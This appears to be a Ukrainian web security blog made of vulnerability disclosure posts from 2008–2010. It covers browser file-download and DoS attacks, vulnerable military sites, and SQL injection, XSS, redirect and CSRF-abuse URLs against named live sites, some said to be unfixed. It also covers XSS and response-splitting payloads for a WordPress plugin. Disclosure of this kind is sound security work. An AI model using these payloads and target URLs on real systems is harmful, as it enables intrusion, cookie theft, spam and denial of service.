Websecurity - Веб безпека

Раніше я розповідав про DoS атаки на різні браузери через різні обробники протоколів. А зараз розповів про дослідження стосовно атаки через протоколи http та ftp, що я провів ще в 2008 році.

В вересні, 18.09.2008, я виявив File Download та Denial of Service уразливості в Mozilla Firefox, Internet Explorer, Google Chrome та Opera. Дане дослідження я розпочав після виявлення в вересні численних Automatic File Download уразливістей в Google Chrome, про які я детально розповів в статті Automatic File Download уразливості в браузерах.

Метою даного дослідженням було створення методики проведення File Download атак в різних браузерах (та DoS атак через SaveAs функціонал). Яку я назвав SaveAs атака (SaveAs attack).

І хоча дана атака не відбувається автоматично (як це мало місце в перших версіях Chrome - в більш нових версіях свого браузера Google виправила дану уразливість, після моїх повідомлень, і браузер запитує перед викаченням файлів), але за рахунок постійного відображення вікна збереження файлу, користувач може випадково натиснути на “Save” і зберегти файл. На відміну від Automatic File Download в Chrome, дана атака працює в різних браузерах (в тому числі в нових версіях Chrome).

Тому даний метод може використовуватися для примусового збереження файла на комп’ютері користувача. А також даний метод може застосовуватися для проведення DoS атаки (через створення багатьох вікон для збереження файлів). File Download атака може призвести до Code Execution, якщо користувач потім відкриє файл (шкідливий), який був ним збережений.

Дані File Download та DoS атаки проводяться через протоколи http і ftp. В експлоітах я вказав файли на серверах Google (для http) та Microsoft (для ftp) - в даних компаній більше серверних потужностей для даної задачі.

DoS атаки відноситься до типу блокуючих DoS та DoS через споживання ресурсів. Дані дві атаки можна провести як з використанням JS, так і без нього (створивши сторінку з великою кількістю iframe, а в Chrome також можна використати frame).

File Download та DoS:

Firefox, IE, Chrome & Opera DoS Exploit6.html (http протокол)

Firefox, IE, Chrome & Opera DoS Exploit7.html (ftp протокол)

Обидва експлоіти працюють в Mozilla Firefox 3.0.19 (і окрім попередніх версій, вони повинні працювати в 3.5.x та 3.6.x), Internet Explorer 6 (6.0.2900.2180), Google Chrome 1.0.154.48 та Opera 9.52.

У браузерах Firefox, IE6 та Opera відбувається блокування та споживання ресурсів (а Firefox 3.0.1 взагалі вилітав). В Chrome відбувається блокування браузера. Але обидва експлоіти не працють в IE8.

Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.

Нещодавно я відправив в БД даного проекту 10 сайтів. З них 5 старих дірявих сайтів, про які я вже писав в новинах раніше, та 5 нових уразливих сайтів.

Це діряві державні mil-сайти: www.mil.ee, portal.navfac.navy.mil, www.cs.amedd.army.mil, w20.afpc.randolph.af.mil, www.stsc.hill.af.mil.

В даній добірці уразливості в веб додатках:

• iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008) (деталі)
• AneCMS Multiple Vulnerabilities (деталі)
• Pulse CMS Arbitrary File Upload Vulnerability (деталі)
• Pulse CMS Cross-Site Request Forgery (деталі)
• MKPortal Anekdot module XSS Vulnerability (деталі)
• MKPortal Contact module XSS Vulnerability (деталі)
• vBulletin 0-day Denial Of Service Exploit (деталі)
• Sun Java HsbParser.getSoundBank Stack Buffer Overflow Vulnerability (деталі)
• Sun Java Runtime AWT setBytePixels Heap Overflow Vulnerability (деталі)
• Sun Java Runtime Environment JPEGImageReader Heap Overflow Vulnerability (деталі)

28.11.2009

У квітні, 10.04.2009, я знайшов Full path disclosure, Cross-Site Scripting, Redirector та SQL Injection уразливості на сайті http://tid.odessa.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.06.2010

Full path disclosure:

http://tid.odessa.ua/adserv/www/delivery/fc.php?MAX_type=1

XSS:

• alert(document.cookie)
• цікавий
• html включення

Redirector:

http://tid.odessa.ua/adserv/www/delivery/ck.php?dest=http://websecurity.com.ua
http://tid.odessa.ua/adserv/adclick.php?maxdest=http://websecurity.com.ua
http://tid.odessa.ua/adserv/adclick.php?dest=http://websecurity.com.ua

SQL Injection:

http://tid.odessa.ua/news/?newsid=-1%20or%20version()=5

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• Novell GroupWise Internet Agent Remote Buffer Overflow Vulnerabilities (деталі)
• New mahara packages fix sql injection (деталі)
• MKPortal lenta module XSS Vulnerability (деталі)
• HP Discovery & Dependency Mapping Inventory (DDMI) Running on Windows, Remote Unauthorized Access (деталі)
• Joomla com_jashowcase Local File Inclusion Vulnerability (деталі)
• MKPortal Recommend module XSS Vulnerability (деталі)
• Kubeit CMS Remote SQL Injection Vulnerability (деталі)
• MKPortal modules metric XSS Vulnerability (деталі)
• Netgear DG632 Router Authentication Bypass Vulnerability (деталі)
• Netgear DG632 Router Remote DoS Vulnerability (деталі)

Учора я знайшов Abuse of Functionality, Insufficient Anti-automation та Cross-Site Scripting уразливості на http://www.w3.org - сайті World Wide Web Consortium (W3C). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.w3.org.

Всього вразливі наступні валідатори W3C:

http://www.w3.org/2003/12/semantic-extractor.html
http://www.w3.org/services/tidy
http://validator.w3.org/mobile/
http://www.w3.org/P3P/validator

Abuse of Functionality:

http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http%3A%2F%2Fwww.w3.org%2Fservices%2Ftidy%3FpassThroughXHTML%3D1%26docAddr%3Dhttp%253A%252F%252Fgoogle.com&xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://google.com&xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http%3A%2F%2Fwww.w3.org%2Fservices%2Ftidy%3FpassThroughXHTML%3D1%26docAddr%3Dhttp%253A%252F%252Fgoogle.com&xslfile=http://google.com

http://www.w3.org/services/tidy?docAddr=http://google.com

http://validator.w3.org/mobile/check?docAddr=http://google.com

http://validator.w3.org/p3p/20020128/p3p.pl?uri=http://google.com

http://validator.w3.org/p3p/20020128/policy.pl?uri=http://google.com

Даний функціонал сайта може використовуватися для проведення CSRF атак на інші сайти.

Insufficient Anti-automation:

На даних сторінках відсутній захист від автоматизованих запитів (капча). Що дозволяє автоматизувати проведення CSRF атак на інші сайти.

XSS:

• alert(document.cookie) (IE)
• alert(document.cookie) (IE)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

27.11.2009

У квітні, 07.04.2009, я знайшов Abuse of Functionality, Insufficient Anti-automation та HTML Injection уразливості на сайті http://news.yahoo.com. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно сайтів компанії Yahoo раніше я вже писав про уразливості на babelfish.altavista.com та babelfish.yahoo.com.

Детальна інформація про уразливості з’явиться пізніше.

26.06.2010

Abuse of Functionality:

http://m2f.news.yahoo.com/mailto/?prop=news&locale=us

В даній формі можна вказати необхідні дані для розсилання спаму. А з врахуванням функції “Send me a copy of this message” та Insufficient Anti-automation, дана уразливість створює з форми цілий Spam Gateway.

Insufficient Anti-automation:

http://m2f.news.yahoo.com/mailto/?prop=news&locale=us

В даній формі немає захисту від автоматизованих запитів (капчі).

HTML Injection (Link Injection):

• редиректор

Для обходу захисту, що дозволяє вставляти тільки URL адреси сайтів Яху, використовується редиректор.

Дані уразливості досі не виправлені.

У квітні, 14.04.2008, я знайшов Abuse of Functionality, Insufficient Anti-automation та Cross-Site Scripting уразливості на http://www.w3.org - сайті World Wide Web Consortium (W3C). Про що найближчим часом сповіщу адміністрацію сайта.

Тоді я виявив можливість використання W3C валідаторів для проведення CSRF атак на інші сайти (з використанням ресурсів сервера W3C). Раніше я вже писав про використання сервісів regex.info, www.slideshare.net та keepvid.com для проведення CSRF атак на сайти.

Всього вразливі наступні валідатори W3C:

http://validator.w3.org/feed/
http://www.w3.org/2001/03/webdata/xsv
http://validator.w3.org/
http://jigsaw.w3.org/css-validator/
http://validator.w3.org/checklink
http://qa-dev.w3.org/unicorn/
http://www.w3.org/RDF/Validator/

Про інші вразливі валідатори я напишу в іншому записі.

Abuse of Functionality:

http://validator.w3.org/feed/check.cgi?url=http://google.com

http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl

http://validator.w3.org/check?uri=http://google.com

http://jigsaw.w3.org/css-validator/validator?uri=http://google.com

http://validator.w3.org/checklink?uri=http://google.com

Зазначу, що сервіс W3C Link Checker може бути використаний для сканування всього сайту і відповідно найбільше споживає ресурсів, як серверу W3C, так і сайту, що сканується. Це може бути використано для проведення DoS атак на зазначені сервери. Про подібні атаки я писав в статті DoS атаки через Abuse of Functionality уразливості.

http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance

http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com

Даний функціонал сайта може використовуватися для проведення CSRF атак на інші сайти.

Insufficient Anti-automation:

На даних сторінках відсутній захист від автоматизованих запитів (капча). Що дозволяє автоматизувати проведення CSRF атак на інші сайти.

XSS (IE):

• alert(document.cookie)
• цікавий

В даній добірці уразливості в веб додатках:

• Important Vulnerabilities in Microsoft ISA Server and Forefront Threat Management Gateway (Medium Business Edition) Could Cause Denial of Service (961759) (деталі)
• PHP-fusion dsmsf (module downloads) SQL Inj3ct0r Exploit (деталі)
• phpMyAdmin <= 2.6.1 disclosure ways (деталі)
• MassMirror Uploader Multiple RFI Exploit (деталі)
• jevoncms (LFI/RFI) Multiple Vulnerabilities (деталі)
• Multiple vulnerabilities in several ATEN IP KVM Switches (деталі)
• CA XOsoft xosoapapi.asmx Multiple Remote Code Execution Vulnerabilities (деталі)
• CA XOsoft Control Service entry_point.aspx Remote Code Execution Vulnerability (деталі)
• Security Notice for CA XOsoft (деталі)
• ASMAX AR 804 gu Web Management Console Arbitrary Shell Command Injection Vulnerability (деталі)

28.04.2010

У квітні, 20.04.2010, я знайшов Full path disclosure, Redirector, Cross-Site Scripting та HTTP Response Spitting уразливості в плагіні Cimy Counter для WordPress. Дані уразливості я виявив на сайті http://vs-db.info (лише HTTP Response Spitting я перевірив в себе на localhost). Про що найближчим часом сповіщу розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

24.06.2010

Full path disclosure:

http://site/wp-content/plugins/cimy-counter/cimy_counter.php

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=%0A1

Redirector:

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=http://websecurity.com.ua

XSS:

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

HTTP Response Spitting:

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=TestCounter&fn=%0AHeader:test

Працює на старих версіях PHP.

Уразливі Cimy Counter 0.9.4 та попередні версії. В версії Cimy Counter 0.9.5 автор виправив усі зазначені уразливості окрім Redirector (також відомий як URL Redirector Abuse в WASC TC v2).

Версія Cimy Counter 1.1.0 вже невразлива.